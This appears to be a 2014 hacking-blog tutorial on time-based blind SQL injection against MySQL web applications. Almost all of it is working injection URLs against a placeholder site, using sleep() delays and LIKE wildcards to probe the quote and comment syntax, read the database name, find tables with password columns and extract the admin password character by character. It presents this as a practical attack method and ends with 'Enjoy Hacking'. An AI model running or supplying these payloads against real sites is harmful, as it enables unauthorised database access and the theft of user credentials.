Hey Friends, after posting other Tutorials on other injection am just getting fed up of writing on SQL Injection only...as i want to move to other topics soon. So Let us continue our journey through the wild valley of SQL Injections. Here we are gonna discuss about Blind Time Based Injection.



i wont make it really long..as the way of exploitation will be same as blind injection just the injection is little changed. so as in blind we were getting to know that the question we asked the database returns true or not by the page loaded. But this time we will know that by the delay in loading the page.

Okay if you have not read all the Basic Tutorial and other before this one...then i suggest you to read them to understand this one.

well the scenario of Time based Blind is when there is no change in page but it is actually vulnerable okay so lets start from testing of this injection.

www.vuln-web.com/photo.php?id=1" and sleep(10)--
No delay
www.vuln-web.com/photo.php?id=1" and sleep(10)#
No delay
www.vuln-web.com/photo.php?id=1" and sleep(10)/*
No delay
www.vuln-web.com/photo.php?id=1" and sleep(10)--+
No delay
www.vuln-web.com/photo.php?id=1 and sleep(10)--
No delay
www.vuln-web.com/photo.php?id=1 and sleep(10)#
No delay
www.vuln-web.com/photo.php?id=1 and sleep(10)/*
No delay
www.vuln-web.com/photo.php?id=1 and sleep(10)--+
No delay
www.vuln-web.com/photo.php?id=1' and sleep(10)--
No Delay
www.vuln-web.com/photo.php?id=1' and sleep(10)#
Delay in page loading
www.vuln-web.com/photo.php?id=1' and sleep(10)/*
No delay
www.vuln-web.com/photo.php?id=1' and sleep(10)--+
No delay

So as now we know the right closing syntax and comment where we actually got the delay. we can continue our injection with that. While using # as comment type always remember to URL encode # to %23.

Getting the Database Name:

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%')#

Okay here in the above query you can understand the basic things as i suppose you read the other tutorials, so the only thing new in this one is 'dual' and like statement.

Dual is a table for testing so we can use it :D. you can go for Dual table in mysql wikipedia if you like to goto its root. over there what i know is that u can use it and continue the injection. Now the 'Like' statement this is used in place of = operator but using like we can actually use wildcard character. If you dont know What is wildcard characters, then i ll suggest this place is not for you. Okay there are two Wildcard character which we are going to use they are '_' which stands for single character and '%' which stands for multiple character. Following are some examples for the Wild Characters usage.

Select username from users where city like '%delhi%';
Will output all the usernames from table users whos city colunm contains delhi.

Select city from users where username like 'n00%'
Will output all the cities whos username column starts with n00 or equals to n00.

Select city from users where username like '___'
i used 3 underscores which means any 3 characters so this will output any city having 3 character username.

Select username,password wehre city like 'u_t__%'
Over here i queried for usernames and password where city starts with 'u' and having 't' on third place and having atleast 5 characters.


So any name which fits it will be passed.
Now let us start our Injection using this method. So the good thing about this injection we can guess and we can also check any character if exists in that word and after collecting this info we can make some nice guesses by our own.

Let us First check The Number of characters in current Database Name.

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '_____')# (we started from 5)
No delay
www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '______')# (Now we chaecked 6)
No Delay
www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '_______')# (Now we checked 7)
Delay

So now we know it have 7 characters. Now lets check the common characters a,e,i,o,u,s,t,r,h


www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%a%')#
Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%e%')#
Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%i%')#
No Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%o%')#
No Delay

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() like '%u%')#
No Delay
And so on.


After collecting this information let us assume we got a,e,d,b,s,_,1
Its the database so we can make a guess it makes the word 'dbase_1'

to make sure we are correct we can check it out

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where database() = 'dbase_1')#
Delay

We got the Database name now lets target tables containing any column name which contains the string "pass".

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')#

We searched for the first table name which contains columns like pass. If the Query returns true that means there is some output. So now we can start guessing out the name after Couting the number of Characters.

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '____')#
No Delay
www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '_____')#
Delay

So we got 5 characters. Now we can start geussing the characters.

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%a%')#
We checked A

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%s%')#
We checked S

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%d%')#
We Checked D

Let us assume we got e,s,r,u after getting this we can quickly the the last will be again s which will make 'users'. Let us try

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like 'users')#
True

okay it worked now we will try to get the columns in the same way i will just give the example query. and u can use the same method to get the data. You can even try for common names.

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select column_name from information_schema.columns where table_schema=database() and table_name='users' and column_name like '%username%' limit 0,1) like '%')#
if they return true then you dont have to waste your time in guessing characters.
in the end the last query to get the admin password we can use:

www.vuln-web.com/photo.php?id=1' and (select sleep(10) from dual where (select password from users wehre username like '%admin%' limit 0,1) like '%')#

Rest you can now start guessing the password characters one by one.
Enjoy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06